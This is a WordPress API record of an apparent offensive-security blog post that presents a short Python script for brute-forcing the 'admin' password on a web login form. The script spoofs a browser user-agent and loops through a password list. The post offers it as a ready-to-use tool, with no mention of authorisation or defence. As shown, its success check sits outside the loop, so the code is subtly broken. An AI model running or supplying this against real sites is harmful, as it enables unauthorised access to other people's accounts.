{"id":439,"date":"2024-03-21T23:05:28","date_gmt":"2024-03-22T03:05:28","guid":{"rendered":"https:\/\/offensivepython.com\/?p=439"},"modified":"2024-03-22T09:21:09","modified_gmt":"2024-03-22T13:21:09","slug":"password-guessing-a-web-login-page","status":"publish","type":"post","link":"https:\/\/offensivepython.com\/index.php\/2024\/03\/21\/password-guessing-a-web-login-page\/","title":{"rendered":"Password Guessing a Web Login Page"},"content":{"rendered":"\t\t
\n\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t\n

Simple code for attempting to guess admin’s password for a web form login.<\/p>\n

\n

from requests import post<\/strong>

# Look like a real browser
HEADER = {“User-Agent”: “Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko)\u00a0 <\/strong>Chrome\/120.0.0.0 Safari\/537.36″}<\/strong>

# Read in my password list
with open(“passwords.txt”) as fh:<\/strong>
\u00a0 \u00a0 passwords = fh.readlines()<\/strong>

# Try to guess
for password in passwords:<\/strong>
\u00a0 \u00a0 post_data = {‘user’: ‘admin’, ‘pass’: password.rstrip()}<\/strong>
\u00a0 \u00a0 response = post(‘https:\/\/website.com\/loginpage.php’, post_data, headers=HEADER)<\/strong>

# This message could obviously change, depending on the site
if ‘The login is invalid.’ not in response.text:<\/strong>
\u00a0 \u00a0 print(f”Guessed! admin\/{password}”)<\/strong><\/p>\n<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"

Simple code for attempting to guess admin’s password for a web form login. from requests import post # Look like a real browserHEADER = {“User-Agent”: “Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko)\u00a0 Chrome\/120.0.0.0 Safari\/537.36″} # Read in my password listwith open(“passwords.txt”) as fh:\u00a0 \u00a0 passwords = fh.readlines() # Try to guess for […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","site-transparent-header":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[35],"tags":[],"class_list":["post-439","post","type-post","status-publish","format-standard","hentry","category-offensive-tool"],"_links":{"self":[{"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/posts\/439","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/comments?post=439"}],"version-history":[{"count":13,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/posts\/439\/revisions"}],"predecessor-version":[{"id":452,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/posts\/439\/revisions\/452"}],"wp:attachment":[{"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/media?parent=439"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/categories?post=439"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/offensivepython.com\/index.php\/wp-json\/wp\/v2\/tags?post=439"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}